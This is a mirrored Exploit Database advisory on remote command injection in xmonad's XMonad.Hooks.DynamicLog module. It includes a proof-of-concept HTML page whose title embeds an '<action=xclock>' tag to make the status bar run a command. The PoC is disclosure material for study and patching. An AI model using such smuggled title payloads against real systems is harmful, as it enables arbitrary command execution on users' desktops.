xmonad XMonad.Hooks.DynamicLog Module – Multiple Remote Command Injection Vulnerabilities

• Exploit Database
• 16 阅读

• 作者： Joachim Breitner
  日期： 2013-07-26
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/38680/

• source: https://www.securityfocus.com/bid/61491/info
  
  XMonad.Hooks.DynamicLog module for xmonad is prone to multiple remote command-injection vulnerabilities.
  
  Successful exploits will result in the execution of arbitrary commands in the context of the affected applications. This may aid in further attacks. 
  
  <html>
  <head>
  <title><action=xclock>An innocent title</action></title>
  </head>
  <body>
  <h1>Good bye, cruel world</h1>
  </body>
  </html>